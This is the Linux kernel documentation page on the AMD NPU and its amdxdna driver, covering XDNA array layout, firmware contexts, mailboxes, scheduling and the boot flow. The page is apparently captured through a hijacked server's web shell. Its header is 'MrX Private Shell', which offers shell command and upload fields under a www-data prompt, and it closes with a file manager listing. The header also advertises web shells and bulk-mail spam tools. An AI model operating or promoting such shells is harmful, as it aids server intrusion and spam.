__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

www-data@216.73.216.173: ~ $
<!DOCTYPE html>

<html lang="en" data-content_root="../../">
  <head>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />

    <title>AMD NPU &#8212; The Linux Kernel  documentation</title>
    <link rel="stylesheet" type="text/css" href="../../_static/pygments.css?v=fa44fd50" />
    <link rel="stylesheet" type="text/css" href="../../_static/alabaster.css?v=3918102e" />
    <script src="../../_static/documentation_options.js?v=5929fcd5"></script>
    <script src="../../_static/doctools.js?v=9bcbadda"></script>
    <script src="../../_static/sphinx_highlight.js?v=dc90522c"></script>
    <link rel="index" title="Index" href="../../genindex.html" />
    <link rel="search" title="Search" href="../../search.html" />
    <link rel="next" title="accel/qaic Qualcomm Cloud AI driver" href="../qaic/index.html" />
    <link rel="prev" title="accel/amdxdna NPU driver" href="index.html" />
   
  <link rel="stylesheet" href="../../_static/custom.css" type="text/css" />
  

  
  

  </head><body>
  <div class="document">
    
      <div class="sphinxsidebar" role="navigation" aria-label="Main">
        <div class="sphinxsidebarwrapper">
            <p class="logo"><a href="../../index.html">
              <img class="logo" src="../../_static/logo.svg" alt="Logo of The Linux Kernel"/>
            </a></p>
<h1 class="logo"><a href="../../index.html">The Linux Kernel</a></h1>



<p class="blurb">6.18.50</p>







<search id="searchbox" style="display: none" role="search">
  <h3 id="searchlabel">Quick search</h3>
    <div class="searchformwrapper">
    <form class="search" action="../../search.html" method="get">
      <input type="text" name="q" aria-labelledby="searchlabel" autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false"/>
      <input type="submit" value="Go" />
    </form>
    </div>
</search>
<script>document.getElementById('searchbox').style.display = "block"</script>


<p>
<h3 class="kernel-toc-contents">Contents</h3>
<input type="checkbox" class="kernel-toc-toggle" id = "kernel-toc-toggle" checked>
<label class="kernel-toc-title" for="kernel-toc-toggle"></label>

<div class="kerneltoc" id="kerneltoc">
<ul>
<li class="toctree-l1"><a class="reference internal" href="../../process/development-process.html">Development process</a></li>
<li class="toctree-l1"><a class="reference internal" href="../../process/submitting-patches.html">Submitting patches</a></li>
<li class="toctree-l1"><a class="reference internal" href="../../process/code-of-conduct.html">Code of conduct</a></li>
<li class="toctree-l1"><a class="reference internal" href="../../maintainer/index.html">Maintainer handbook</a></li>
<li class="toctree-l1"><a class="reference internal" href="../../process/index.html">All development-process docs</a></li>
</ul>
<ul class="current">
<li class="toctree-l1"><a class="reference internal" href="../../core-api/index.html">Core API</a></li>
<li class="toctree-l1"><a class="reference internal" href="../../driver-api/index.html">Driver APIs</a></li>
<li class="toctree-l1 current"><a class="reference internal" href="../../subsystem-apis.html">Subsystems</a><ul class="current">
<li class="toctree-l2"><a class="reference internal" href="../../subsystem-apis.html#core-subsystems">Core subsystems</a></li>
<li class="toctree-l2"><a class="reference internal" href="../../subsystem-apis.html#human-interfaces">Human interfaces</a></li>
<li class="toctree-l2"><a class="reference internal" href="../../subsystem-apis.html#networking-interfaces">Networking interfaces</a></li>
<li class="toctree-l2"><a class="reference internal" href="../../subsystem-apis.html#storage-interfaces">Storage interfaces</a></li>
<li class="toctree-l2 current"><a class="reference internal" href="../../subsystem-apis.html#other-subsystems">Other subsystems</a><ul class="current">
<li class="toctree-l3"><a class="reference internal" href="../../accounting/index.html">Accounting</a></li>
<li class="toctree-l3"><a class="reference internal" href="../../cpu-freq/index.html">CPUFreq - CPU frequency and voltage scaling code in the Linux(TM) kernel</a></li>
<li class="toctree-l3"><a class="reference internal" href="../../edac/index.html">EDAC Subsystem</a></li>
<li class="toctree-l3"><a class="reference internal" href="../../fpga/index.html">FPGA</a></li>
<li class="toctree-l3"><a class="reference internal" href="../../i2c/index.html">I2C/SMBus Subsystem</a></li>
<li class="toctree-l3"><a class="reference internal" href="../../iio/index.html">Industrial I/O</a></li>
<li class="toctree-l3"><a class="reference internal" href="../../pcmcia/index.html">PCMCIA</a></li>
<li class="toctree-l3"><a class="reference internal" href="../../spi/index.html">Serial Peripheral Interface (SPI)</a></li>
<li class="toctree-l3"><a class="reference internal" href="../../w1/index.html">1-Wire Subsystem</a></li>
<li class="toctree-l3"><a class="reference internal" href="../../watchdog/index.html">Watchdog Support</a></li>
<li class="toctree-l3"><a class="reference internal" href="../../virt/index.html">Virtualization Support</a></li>
<li class="toctree-l3"><a class="reference internal" href="../../hwmon/index.html">Hardware Monitoring</a></li>
<li class="toctree-l3 current"><a class="reference internal" href="../index.html">Compute Accelerators</a></li>
<li class="toctree-l3"><a class="reference internal" href="../../security/index.html">Security Documentation</a></li>
<li class="toctree-l3"><a class="reference internal" href="../../crypto/index.html">Crypto API</a></li>
<li class="toctree-l3"><a class="reference internal" href="../../bpf/index.html">BPF Documentation</a></li>
<li class="toctree-l3"><a class="reference internal" href="../../usb/index.html">USB support</a></li>
<li class="toctree-l3"><a class="reference internal" href="../../PCI/index.html">PCI Bus Subsystem</a></li>
<li class="toctree-l3"><a class="reference internal" href="../../misc-devices/index.html">Assorted Miscellaneous Devices Documentation</a></li>
<li class="toctree-l3"><a class="reference internal" href="../../peci/index.html">PECI Subsystem</a></li>
<li class="toctree-l3"><a class="reference internal" href="../../wmi/index.html">WMI Subsystem</a></li>
<li class="toctree-l3"><a class="reference internal" href="../../tee/index.html">TEE Subsystem</a></li>
</ul>
</li>
</ul>
</li>
<li class="toctree-l1"><a class="reference internal" href="../../locking/index.html">Locking</a></li>
</ul>
<ul>
<li class="toctree-l1"><a class="reference internal" href="../../process/license-rules.html">Licensing rules</a></li>
<li class="toctree-l1"><a class="reference internal" href="../../doc-guide/index.html">Writing documentation</a></li>
<li class="toctree-l1"><a class="reference internal" href="../../dev-tools/index.html">Development tools</a></li>
<li class="toctree-l1"><a class="reference internal" href="../../dev-tools/testing-overview.html">Testing guide</a></li>
<li class="toctree-l1"><a class="reference internal" href="../../kernel-hacking/index.html">Hacking guide</a></li>
<li class="toctree-l1"><a class="reference internal" href="../../trace/index.html">Tracing</a></li>
<li class="toctree-l1"><a class="reference internal" href="../../fault-injection/index.html">Fault injection</a></li>
<li class="toctree-l1"><a class="reference internal" href="../../livepatch/index.html">Livepatching</a></li>
<li class="toctree-l1"><a class="reference internal" href="../../rust/index.html">Rust</a></li>
</ul>
<ul>
<li class="toctree-l1"><a class="reference internal" href="../../admin-guide/index.html">Administration</a></li>
<li class="toctree-l1"><a class="reference internal" href="../../kbuild/index.html">Build system</a></li>
<li class="toctree-l1"><a class="reference internal" href="../../admin-guide/reporting-issues.html">Reporting issues</a></li>
<li class="toctree-l1"><a class="reference internal" href="../../tools/index.html">Userspace tools</a></li>
<li class="toctree-l1"><a class="reference internal" href="../../userspace-api/index.html">Userspace API</a></li>
</ul>
<ul>
<li class="toctree-l1"><a class="reference internal" href="../../firmware-guide/index.html">Firmware</a></li>
<li class="toctree-l1"><a class="reference internal" href="../../devicetree/index.html">Firmware and Devicetree</a></li>
</ul>
<ul>
<li class="toctree-l1"><a class="reference internal" href="../../arch/index.html">CPU architectures</a></li>
</ul>
<ul>
<li class="toctree-l1"><a class="reference internal" href="../../staging/index.html">Unsorted documentation</a></li>
</ul>
<ul>
<li class="toctree-l1"><a class="reference internal" href="../../translations/index.html">Translations</a></li>
</ul>

</div>

<script type="text/javascript"> <!--
  var sbar = document.getElementsByClassName("sphinxsidebar")[0];
  let currents = document.getElementsByClassName("current")
  if (currents.length) {
    sbar.scrollTop = currents[currents.length - 1].offsetTop;
  }
  --> </script>
  <div role="note" aria-label="source link">
    <h3>This Page</h3>
    <ul class="this-page-menu">
      <li><a href="../../_sources/accel/amdxdna/amdnpu.rst.txt"
            rel="nofollow">Show Source</a></li>
    </ul>
   </div>
        </div>
      </div>
      <div class="documentwrapper">
        <div class="bodywrapper">
          

          <div class="body" role="main">
            
  



<section id="amd-npu">
<h1>AMD NPU<a class="headerlink" href="#amd-npu" title="Link to this heading">¶</a></h1>
<dl class="field-list simple">
<dt class="field-odd">Copyright<span class="colon">:</span></dt>
<dd class="field-odd"><p>© 2024 Advanced Micro Devices, Inc.</p>
</dd>
<dt class="field-even">Author<span class="colon">:</span></dt>
<dd class="field-even"><p>Sonal Santan &lt;<a class="reference external" href="mailto:sonal&#46;santan&#37;&#52;&#48;amd&#46;com">sonal<span>&#46;</span>santan<span>&#64;</span>amd<span>&#46;</span>com</a>&gt;</p>
</dd>
</dl>
<section id="overview">
<h2>Overview<a class="headerlink" href="#overview" title="Link to this heading">¶</a></h2>
<p>AMD NPU (Neural Processing Unit) is a multi-user AI inference accelerator
integrated into AMD client APU. NPU enables efficient execution of Machine
Learning applications like CNN, LLM, etc. NPU is based on
<a class="reference external" href="https://www.amd.com/en/technologies/xdna.html">AMD XDNA Architecture</a>. NPU is managed by <strong>amdxdna</strong> driver.</p>
</section>
<section id="hardware-description">
<h2>Hardware Description<a class="headerlink" href="#hardware-description" title="Link to this heading">¶</a></h2>
<p>AMD NPU consists of the following hardware components:</p>
<section id="amd-xdna-array">
<h3>AMD XDNA Array<a class="headerlink" href="#amd-xdna-array" title="Link to this heading">¶</a></h3>
<p>AMD XDNA Array comprises of 2D array of compute and memory tiles built with
<a class="reference external" href="https://www.xilinx.com/products/technology/ai-engine.html">AMD AI Engine Technology</a>. Each column has 4 rows of compute tiles and 1
row of memory tile. Each compute tile contains a VLIW processor with its own
dedicated program and data memory. The memory tile acts as L2 memory. The 2D
array can be partitioned at a column boundary creating a spatially isolated
partition which can be bound to a workload context.</p>
<p>Each column also has dedicated DMA engines to move data between host DDR and
memory tile.</p>
<p>AMD Phoenix and AMD Hawk Point client NPU have a 4x5 topology, i.e., 4 rows of
compute tiles arranged into 5 columns. AMD Strix Point client APU have 4x8
topology, i.e., 4 rows of compute tiles arranged into 8 columns.</p>
</section>
<section id="shared-l2-memory">
<h3>Shared L2 Memory<a class="headerlink" href="#shared-l2-memory" title="Link to this heading">¶</a></h3>
<p>The single row of memory tiles create a pool of software managed on chip L2
memory. DMA engines are used to move data between host DDR and memory tiles.
AMD Phoenix and AMD Hawk Point NPUs have a total of 2560 KB of L2 memory.
AMD Strix Point NPU has a total of 4096 KB of L2 memory.</p>
</section>
<section id="microcontroller">
<h3>Microcontroller<a class="headerlink" href="#microcontroller" title="Link to this heading">¶</a></h3>
<p>A microcontroller runs NPU Firmware which is responsible for command processing,
XDNA Array partition setup, XDNA Array configuration, workload context
management and workload orchestration.</p>
<p>NPU Firmware uses a dedicated instance of an isolated non-privileged context
called ERT to service each workload context. ERT is also used to execute user
provided <code class="docutils literal notranslate"><span class="pre">ctrlcode</span></code> associated with the workload context.</p>
<p>NPU Firmware uses a single isolated privileged context called MERT to service
management commands from the amdxdna driver.</p>
</section>
<section id="mailboxes">
<h3>Mailboxes<a class="headerlink" href="#mailboxes" title="Link to this heading">¶</a></h3>
<p>The microcontroller and amdxdna driver use a privileged channel for management
tasks like setting up of contexts, telemetry, query, error handling, setting up
user channel, etc. As mentioned before, privileged channel requests are
serviced by MERT. The privileged channel is bound to a single mailbox.</p>
<p>The microcontroller and amdxdna driver use a dedicated user channel per
workload context. The user channel is primarily used for submitting work to
the NPU. As mentioned before, a user channel requests are serviced by an
instance of ERT. Each user channel is bound to its own dedicated mailbox.</p>
</section>
<section id="pcie-ep">
<h3>PCIe EP<a class="headerlink" href="#pcie-ep" title="Link to this heading">¶</a></h3>
<p>NPU is visible to the x86 host CPU as a PCIe device with multiple BARs and some
MSI-X interrupt vectors. NPU uses a dedicated high bandwidth SoC level fabric
for reading or writing into host memory. Each instance of ERT gets its own
dedicated MSI-X interrupt. MERT gets a single instance of MSI-X interrupt.</p>
<p>The number of PCIe BARs varies depending on the specific device. Based on their
functions, PCIe BARs can generally be categorized into the following types.</p>
<ul class="simple">
<li><p>PSP BAR: Expose the AMD PSP (Platform Security Processor) function</p></li>
<li><p>SMU BAR: Expose the AMD SMU (System Management Unit) function</p></li>
<li><p>SRAM BAR: Expose ring buffers for the mailbox</p></li>
<li><p>Mailbox BAR: Expose the mailbox control registers (head, tail and ISR
registers etc.)</p></li>
<li><p>Public Register BAR: Expose public registers</p></li>
</ul>
<p>On specific devices, the above-mentioned BAR type might be combined into a
single physical PCIe BAR. Or a module might require two physical PCIe BARs to
be fully functional. For example,</p>
<ul class="simple">
<li><p>On AMD Phoenix device, PSP, SMU, Public Register BARs are on PCIe BAR index 0.</p></li>
<li><p>On AMD Strix Point device, Mailbox and Public Register BARs are on PCIe BAR
index 0. The PSP has some registers in PCIe BAR index 0 (Public Register BAR)
and PCIe BAR index 4 (PSP BAR).</p></li>
</ul>
</section>
<section id="process-isolation-hardware">
<h3>Process Isolation Hardware<a class="headerlink" href="#process-isolation-hardware" title="Link to this heading">¶</a></h3>
<p>As explained before, XDNA Array can be dynamically divided into isolated
spatial partitions, each of which may have one or more columns. The spatial
partition is setup by programming the column isolation registers by the
microcontroller. Each spatial partition is associated with a PASID which is
also programmed by the microcontroller. Hence multiple spatial partitions in
the NPU can make concurrent host access protected by PASID.</p>
<p>The NPU FW itself uses microcontroller MMU enforced isolated contexts for
servicing user and privileged channel requests.</p>
</section>
</section>
<section id="mixed-spatial-and-temporal-scheduling">
<h2>Mixed Spatial and Temporal Scheduling<a class="headerlink" href="#mixed-spatial-and-temporal-scheduling" title="Link to this heading">¶</a></h2>
<p>AMD XDNA architecture supports mixed spatial and temporal (time sharing)
scheduling of 2D array. This means that spatial partitions may be setup and
torn down dynamically to accommodate various workloads. A <em>spatial</em> partition
may be <em>exclusively</em> bound to one workload context while another partition may
be <em>temporarily</em> bound to more than one workload contexts. The microcontroller
updates the PASID for a temporarily shared partition to match the context that
has been bound to the partition at any moment.</p>
<section id="resource-solver">
<h3>Resource Solver<a class="headerlink" href="#resource-solver" title="Link to this heading">¶</a></h3>
<p>The Resource Solver component of the amdxdna driver manages the allocation
of 2D array among various workloads. Every workload describes the number
of columns required to run the NPU binary in its metadata. The Resource Solver
component uses hints passed by the workload and its own heuristics to
decide 2D array (re)partition strategy and mapping of workloads for spatial and
temporal sharing of columns. The FW enforces the context-to-column(s) resource
binding decisions made by the Resource Solver.</p>
<p>AMD Phoenix and AMD Hawk Point client NPU can support 6 concurrent workload
contexts. AMD Strix Point can support 16 concurrent workload contexts.</p>
</section>
</section>
<section id="application-binaries">
<h2>Application Binaries<a class="headerlink" href="#application-binaries" title="Link to this heading">¶</a></h2>
<p>A NPU application workload is comprised of two separate binaries which are
generated by the NPU compiler.</p>
<ol class="arabic simple">
<li><p>AMD XDNA Array overlay, which is used to configure a NPU spatial partition.
The overlay contains instructions for setting up the stream switch
configuration and ELF for the compute tiles. The overlay is loaded on the
spatial partition bound to the workload by the associated ERT instance.
Refer to the
<a class="reference external" href="https://docs.amd.com/r/en-US/am020-versal-aie-ml">Versal Adaptive SoC AIE-ML Architecture Manual (AM020)</a> for more details.</p></li>
<li><p><code class="docutils literal notranslate"><span class="pre">ctrlcode</span></code>, used for orchestrating the overlay loaded on the spatial
partition. <code class="docutils literal notranslate"><span class="pre">ctrlcode</span></code> is executed by the ERT running in protected mode on
the microcontroller in the context of the workload. <code class="docutils literal notranslate"><span class="pre">ctrlcode</span></code> is made up
of a sequence of opcodes named <code class="docutils literal notranslate"><span class="pre">XAie_TxnOpcode</span></code>. Refer to the
<a class="reference external" href="https://github.com/Xilinx/aie-rt/tree/release/main_aig">AI Engine Run Time</a> for more details.</p></li>
</ol>
</section>
<section id="special-host-buffers">
<h2>Special Host Buffers<a class="headerlink" href="#special-host-buffers" title="Link to this heading">¶</a></h2>
<section id="per-context-instruction-buffer">
<h3>Per-context Instruction Buffer<a class="headerlink" href="#per-context-instruction-buffer" title="Link to this heading">¶</a></h3>
<p>Every workload context uses a host resident 64 MB buffer which is memory
mapped into the ERT instance created to service the workload. The <code class="docutils literal notranslate"><span class="pre">ctrlcode</span></code>
used by the workload is copied into this special memory. This buffer is
protected by PASID like all other input/output buffers used by that workload.
Instruction buffer is also mapped into the user space of the workload.</p>
</section>
<section id="global-privileged-buffer">
<h3>Global Privileged Buffer<a class="headerlink" href="#global-privileged-buffer" title="Link to this heading">¶</a></h3>
<p>In addition, the driver also allocates a single buffer for maintenance tasks
like recording errors from MERT. This global buffer uses the global IOMMU
domain and is only accessible by MERT.</p>
</section>
</section>
<section id="high-level-use-flow">
<h2>High-level Use Flow<a class="headerlink" href="#high-level-use-flow" title="Link to this heading">¶</a></h2>
<p>Here are the steps to run a workload on AMD NPU:</p>
<ol class="arabic simple">
<li><p>Compile the workload into an overlay and a <code class="docutils literal notranslate"><span class="pre">ctrlcode</span></code> binary.</p></li>
<li><p>Userspace opens a context in the driver and provides the overlay.</p></li>
<li><p>The driver checks with the Resource Solver for provisioning a set of columns
for the workload.</p></li>
<li><p>The driver then asks MERT to create a context on the device with the desired
columns.</p></li>
<li><p>MERT then creates an instance of ERT. MERT also maps the Instruction Buffer
into ERT memory.</p></li>
<li><p>The userspace then copies the <code class="docutils literal notranslate"><span class="pre">ctrlcode</span></code> to the Instruction Buffer.</p></li>
<li><p>Userspace then creates a command buffer with pointers to input, output, and
instruction buffer; it then submits command buffer with the driver and goes
to sleep waiting for completion.</p></li>
<li><p>The driver sends the command over the Mailbox to ERT.</p></li>
<li><p>ERT <em>executes</em> the <code class="docutils literal notranslate"><span class="pre">ctrlcode</span></code> in the instruction buffer.</p></li>
<li><p>Execution of the <code class="docutils literal notranslate"><span class="pre">ctrlcode</span></code> kicks off DMAs to and from the host DDR while
AMD XDNA Array is running.</p></li>
<li><p>When ERT reaches end of <code class="docutils literal notranslate"><span class="pre">ctrlcode</span></code>, it raises an MSI-X to send completion
signal to the driver which then wakes up the waiting workload.</p></li>
</ol>
</section>
<section id="boot-flow">
<h2>Boot Flow<a class="headerlink" href="#boot-flow" title="Link to this heading">¶</a></h2>
<p>amdxdna driver uses PSP to securely load signed NPU FW and kick off the boot
of the NPU microcontroller. amdxdna driver then waits for the alive signal in
a special location on BAR 0. The NPU is switched off during SoC suspend and
turned on after resume where the NPU FW is reloaded, and the handshake is
performed again.</p>
</section>
<section id="userspace-components">
<h2>Userspace components<a class="headerlink" href="#userspace-components" title="Link to this heading">¶</a></h2>
<section id="compiler">
<h3>Compiler<a class="headerlink" href="#compiler" title="Link to this heading">¶</a></h3>
<p>Peano is an LLVM based open-source single core compiler for AMD XDNA Array
compute tile. Peano is available at:
<a class="reference external" href="https://github.com/Xilinx/llvm-aie">https://github.com/Xilinx/llvm-aie</a></p>
<p>IRON is an open-source array compiler for AMD XDNA Array based NPU which uses
Peano underneath. IRON is available at:
<a class="reference external" href="https://github.com/Xilinx/mlir-aie">https://github.com/Xilinx/mlir-aie</a></p>
</section>
<section id="usermode-driver-umd">
<h3>Usermode Driver (UMD)<a class="headerlink" href="#usermode-driver-umd" title="Link to this heading">¶</a></h3>
<p>The open-source XRT runtime stack interfaces with amdxdna kernel driver. XRT
can be found at:
<a class="reference external" href="https://github.com/Xilinx/XRT">https://github.com/Xilinx/XRT</a></p>
<p>The open-source XRT shim for NPU is can be found at:
<a class="reference external" href="https://github.com/amd/xdna-driver">https://github.com/amd/xdna-driver</a></p>
</section>
</section>
<section id="dma-operation">
<h2>DMA Operation<a class="headerlink" href="#dma-operation" title="Link to this heading">¶</a></h2>
<p>DMA operation instructions are encoded in the <code class="docutils literal notranslate"><span class="pre">ctrlcode</span></code> as
<code class="docutils literal notranslate"><span class="pre">XAIE_IO_BLOCKWRITE</span></code> opcode. When ERT executes <code class="docutils literal notranslate"><span class="pre">XAIE_IO_BLOCKWRITE</span></code>, DMA
operations between host DDR and L2 memory are effected.</p>
</section>
<section id="error-handling">
<h2>Error Handling<a class="headerlink" href="#error-handling" title="Link to this heading">¶</a></h2>
<p>When MERT detects an error in AMD XDNA Array, it pauses execution for that
workload context and sends an asynchronous message to the driver over the
privileged channel. The driver then sends a buffer pointer to MERT to capture
the register states for the partition bound to faulting workload context. The
driver then decodes the error by reading the contents of the buffer pointer.</p>
</section>
<section id="telemetry">
<h2>Telemetry<a class="headerlink" href="#telemetry" title="Link to this heading">¶</a></h2>
<p>MERT can report various kinds of telemetry information like the following:</p>
<ul class="simple">
<li><p>L1 interrupt counter</p></li>
<li><p>DMA counter</p></li>
<li><p>Deep Sleep counter</p></li>
<li><p>etc.</p></li>
</ul>
</section>
<section id="references">
<h2>References<a class="headerlink" href="#references" title="Link to this heading">¶</a></h2>
<ul class="simple">
<li><p><a class="reference external" href="https://www.amd.com/en/technologies/xdna.html">AMD XDNA Architecture</a></p></li>
<li><p><a class="reference external" href="https://www.xilinx.com/products/technology/ai-engine.html">AMD AI Engine Technology</a></p></li>
<li><p><a class="reference external" href="https://github.com/Xilinx/llvm-aie">Peano</a></p></li>
<li><p><a class="reference external" href="https://docs.amd.com/r/en-US/am020-versal-aie-ml">Versal Adaptive SoC AIE-ML Architecture Manual (AM020)</a></p></li>
<li><p><a class="reference external" href="https://github.com/Xilinx/aie-rt/tree/release/main_aig">AI Engine Run Time</a></p></li>
</ul>
</section>
</section>


          </div>
          
        </div>
      </div>
    <div class="clearer"></div>
  </div>
    <div class="footer">
      &#169;The kernel development community.
      
      |
      Powered by <a href="https://www.sphinx-doc.org/">Sphinx 8.1.3</a>
      &amp; <a href="https://alabaster.readthedocs.io">Alabaster 0.7.16</a>
      
      |
      <a href="../../_sources/accel/amdxdna/amdnpu.rst.txt"
          rel="nofollow">Page source</a>
    </div>

    

    
  </body>
</html>

Filemanager

Name Type Size Permission Actions
amdnpu.html File 25.93 KB 0644
index.html File 12.74 KB 0644
Filemanager